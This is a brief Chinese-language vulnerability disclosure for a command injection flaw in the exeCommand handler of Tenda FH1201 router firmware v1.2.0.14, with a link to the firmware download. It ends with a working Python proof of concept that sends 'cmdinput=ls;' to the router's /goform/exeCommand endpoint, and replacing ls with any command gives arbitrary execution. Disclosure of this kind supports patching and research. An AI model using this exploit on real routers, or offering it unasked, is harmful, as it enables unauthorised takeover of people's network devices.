Tenda FH1201 v1.2.0.14存在命令注入漏洞,位于exeCommand函数中,cmdinput参数未经任何过滤就被复制到栈空间v7中,然后执行,因此攻击者可以利用该漏洞执行任意命令
固件下载网站:https://www.tendacn.com/download/detail-3322.html
import requests
ip = '192.168.74.145'
url = f"http://{ip}/goform/exeCommand"
data = "cmdinput=ls;"
ret = requests.post(url=url,data=data)